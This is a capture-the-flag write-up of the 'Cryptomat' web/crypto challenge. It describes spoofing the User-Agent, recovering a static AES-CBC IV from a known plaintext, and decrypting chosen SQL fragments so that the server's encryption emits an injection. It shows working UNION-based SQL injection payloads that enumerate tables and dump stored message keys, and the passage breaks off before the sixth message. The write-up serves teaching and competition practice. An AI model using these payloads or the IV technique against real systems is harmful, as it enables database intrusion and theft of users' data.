Cryptomat is back! You know the drill. Get the key from Dog.
This was a nice web / crypto challenge. We first stumble upon an error when we try to access the website:
You are not using a secure browser! (Compatible browsers expose the string SECURE in the useragent).
Okay, this is not hard to bypass. The server can find out which browser we are using by looking at the User-Agent header in our HTTP request. We just have to send User-Agent: SECURE. But crafting our own requests every time is annoying, so we used a Firefox add-on: « User-Agent switcher ». We are now ready for the challenge.
The website lets us send messages to other people with a key. The text is encrypted with AES-128 in CBC mode (and output in base64). We noticed that the server sent a Set-Cookie header « admin=0 » on the domain « admin.local ». Sending a request to /admin.php with a Host: admin.local header showed us some information like the number of accounts/messages, but nothing interesting.
Firstly, we’re gonna try to decrypt our own messages. I created a message with the key « abcd » and the message « abcdabcdabcdabcdabcdabcdabcd ». The resulting ciphertext is mq8jyy5npsr3t1DR/33B4ZlY304+NOCGLXGp7stWcKk=. If we try to decrypt this ciphertext :
<?php
// No IV argument is passed to mcrypt_decrypt here.
$c = "mq8jyy5npsr3t1DR/33B4ZlY304+NOCGLXGp7stWcKk=";
echo mcrypt_decrypt(MCRYPT_RIJNDAEL_128, "abcd", base64_decode($c), MCRYPT_MODE_CBC);
We get something like « Y Q"S30PYR4]XZ- abcdabcdabcd ». The first 16 bytes are garbled because CBC mode XORs the first decrypted block with the Initialization Vector, and we did not supply one. We should recover it. For that, we just have to XOR the first 16 chars with « abcdabcdabcdabcd ». The IV found is « 8k2F2QS480W998Nm ». We can now correctly encrypt / decrypt messages 🙂
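The IV recovery described above, as an added example that is not part of the original write-up. It uses PHP's openssl extension in place of the removed mcrypt, assumes mcrypt's NUL-padding of short keys and plaintexts, and builds the "server" ciphertext locally from the page's key, plaintext and IV; `pad_nul`, `cbc` and `recover_iv` are hypothetical helper names.

```php
<?php
// Added example (not the challenge's code). Assumptions: openssl replaces the
// removed mcrypt extension; short keys and plaintexts are NUL-padded as mcrypt did.
const BLOCK = 16;

// NUL-pad a string up to the next multiple of the AES block size.
function pad_nul(string $s): string {
    return str_pad($s, (int) ceil(strlen($s) / BLOCK) * BLOCK, "\0");
}

// Raw AES-128-CBC with no padding scheme; $op is 'enc' or 'dec'.
function cbc(string $op, string $data, string $key, string $iv): string {
    $fn  = $op === 'enc' ? 'openssl_encrypt' : 'openssl_decrypt';
    $out = $fn($data, 'aes-128-cbc', pad_nul($key),
               OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $iv);
    if ($out === false) {
        throw new RuntimeException("openssl failure: " . openssl_error_string());
    }
    return $out;
}

// CBC decryption computes P1 = D(C1) XOR IV. Decrypting with an all-zero IV
// therefore yields D(C1) = P1 XOR IV_real; XOR with the known P1 leaves IV_real.
function recover_iv(string $ciphertext, string $key, string $knownPlain): string {
    $garbled = cbc('dec', $ciphertext, $key, str_repeat("\0", BLOCK));
    return substr($garbled, 0, BLOCK) ^ substr($knownPlain, 0, BLOCK);
}

// Constructed stand-in for the server: encrypts under the static IV from the write-up.
$staticIv = "8k2F2QS480W998Nm";
$known    = "abcdabcdabcdabcdabcdabcdabcd";
$ct       = cbc('enc', pad_nul($known), "abcd", $staticIv);

// What the IV-less decryption shows: garbled first block, readable later blocks.
$garbled = cbc('dec', $ct, "abcd", str_repeat("\0", BLOCK));
echo "first block, zero IV : ", bin2hex(substr($garbled, 0, BLOCK)), "\n";
echo "later blocks         : ", rtrim(substr($garbled, BLOCK), "\0"), "\n";

$iv = recover_iv($ct, "abcd", $known);
echo "recovered IV         : ", $iv, "\n";
echo "matches static IV    : ", var_export($iv === $staticIv, true), "\n";
echo "full decrypt         : ", rtrim(cbc('dec', $ct, "abcd", $iv), "\0"), "\n";
```

The relation depends only on CBC mode, not on AES, so a fixed IV can be recovered by any user who knows the key and the first plaintext block of one of their own messages.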
We found the bug by typing random stuff in the Search form. The search form allows us to search for a plaintext in our messages knowing the key. But how does the server search for it? Basically, the given plaintext is encrypted with the key, and is then used in a SQL query for the search. Yes, there is a SQL Injection! Example with the query « aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa » and the key « aaaa » :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'jÆŽÝv>Ç—¿˜¶" ORDER BY id ASC LIMIT ?, 10' at line 1
The error is due to a double quote (") in the encrypted message. We now have to generate correct queries which will encrypt to some SQL injection. Since we know both the key and the IV, we can simply do that by decrypting a SQL injection:
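<?php
// Decrypt the desired SQL fragment with the known key and IV; the server's
// encryption of the output then reproduces that fragment.
$plaintext = '" or "1"="1';
$ciphertext = mcrypt_decrypt(MCRYPT_RIJNDAEL_128, "a", $plaintext, MCRYPT_MODE_CBC, "8k2F2QS480W998Nm");
echo urlencode($ciphertext);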
Going to search.php?key=a&query=[result of the PHP script], we can see that our injection works! Let's try some simple union:
" union select 1,2,3--
We always got errors. It was impossible to insert comments (--, #, /* ...). The errors were due to a column « id », as we could see in the previous SQL errors. This injection worked:
" union select 1 as id, "1
The used SELECT statements have a different number of columns.
" union select 1,1,1,1,1,42,1 as id, "1
This injection works perfectly! 😀 We're gonna use the column holding 42. The database is MySQL; let's see the tables and the columns.
" union select 1,1,1,1,1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),1 as id, "1
The tables are « message » and « user ». The user table contains the passwords of the users. We managed to get Dog's password, but it was full of non-printable characters. We didn't manage to log in as Dog. We therefore directly tried to view the encrypted messages in the database.
" union select 1,1,1,1,1,(select concat_ws("<br>", key, text) from message where id=1),1 as id, "1
This showed us the first message, encrypted, but with its corresponding key. Decrypting it with our PHP script revealed the plaintext: « GUESS WHAT? ». We repeated this with other message ids = 2, 3, 4… Here are the plaintexts:
GUESS WHAT? you smell !!!!!!!!!!!!!!!!! lol
And the sixth message: